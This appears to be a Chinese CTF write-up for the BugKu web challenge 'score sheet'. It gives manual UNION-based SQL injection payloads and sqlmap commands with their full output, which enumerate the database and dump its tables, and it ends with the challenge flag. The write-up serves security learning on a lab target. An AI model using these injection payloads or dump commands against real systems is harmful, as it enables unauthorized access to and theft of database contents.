http://123.206.87.240:8002/chengjidan/

?

題解：

版本一

輸入0' union select database(),2,3,4 #

數據庫名：skctf_flag

輸入0' union select table_name,2,3,4 from information_schema.tables where table_schema='skctf_flag'#?

數據庫表名：fl4g??

輸入0' union select column_name,2,3,4 from information_schema.columns where table_name='fl4g'#

數據庫列名：skctf_flag

輸入0' union select skctf_flag,2,3,4 from fl4g#

flag：BUGKU{Sql_INJECT0N_4813drd8hz4}?

版本二

工具：sqlmap

sqlmap檢測sql注入

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1"

?結果

POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests: --- Parameter: id (POST)Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'fELh'='fELhType: UNION queryTitle: Generic UNION query (NULL) - 4 columnsPayload: id=-7971' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x4156665a546b554a6a64424c6354514d526f575257527a65414d586d516d6a765548776476594570,0x716b707671),NULL-- ErNP --- [11:01:58] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12

數據庫：mysql

?

?列舉數據庫

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" --dbs

結果

available databases [2]: [*] information_schema [*] skctf_flag

數據庫：skctf_flag

?

列舉數據庫skctf_flag的表?

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump

結果

Database: skctf_flag [2 tables] +------+ | fl4g | | sc | +------+

skctf_flag的數據表：

fl4g

sc

?

?列舉內容

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump

結果?

Database: skctf_flag Table: sc [3 entries] +----+------+------+---------+---------+ | id | name | math | chinese | english | +----+------+------+---------+---------+ | 1 | 龍龍龍 | 60 | 70 | 60 | | 2 | 浩兒 | 70 | 74 | 84 | | 3 | 靜靜 | 80 | 90 | 85 | +----+------+------+---------+---------+[11:13:09] [INFO] table 'skctf_flag.sc' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\120.24.86.145\dump\skctf_flag\sc.csv' [11:13:09] [INFO] fetching columns for table 'fl4g' in database 'skctf_flag' [11:13:09] [INFO] used SQL query returns 1 entries [11:13:09] [INFO] fetching entries for table 'fl4g' in database 'skctf_flag' [11:13:09] [INFO] used SQL query returns 1 entries [11:13:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [11:13:09] [INFO] fetching number of entries for table 'fl4g' in database 'skctf_flag' [11:13:09] [WARNING] time-based comparison requires larger statistical model, please wait................ (done) [11:13:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y 1 [11:17:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done) [11:18:03] [INFO] adjusting time delay to 2 seconds due to good response times BUGKU[11:18:42] [ERROR] invalid character detected. retrying.. [11:18:42] [WARNING] increasing time delay to 3 seconds {Sq[11:20:01] [ERROR] invalid character detected. retrying.. [11:20:01] [WARNING] increasing time delay to 4 seconds l_INJE[11:21:48] [ERROR] invalid character detected. retrying.. [11:21:48] [WARNING] increasing time delay to 5 seconds CT0N_4[11:24:01] [ERROR] invalid character detected. retrying.. [11:24:01] [WARNING] increasing time delay to 6 seconds 81[11:24:54] [ERROR] invalid character detected. retrying.. [11:24:54] [WARNING] increasing time delay to 7 seconds 3dr[11:26:24] [ERROR] invalid character detected. retrying.. [11:26:24] [WARNING] increasing time delay to 8 seconds d[11:27:10] [ERROR] invalid character detected. retrying.. [11:27:10] [WARNING] increasing time delay to 9 seconds 8hz4} Database: skctf_flag Table: fl4g [1 entry] +---------------------------------+ | skctf_flag | +---------------------------------+ | BUGKU{Sql_INJECT0N_4813drd8hz4} | +---------------------------------+

flag：BUGKU{Sql_INJECT0N_4813drd8hz4}?

總結

以上是生活随笔為你收集整理的BugKuCTF WEB 成绩单的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。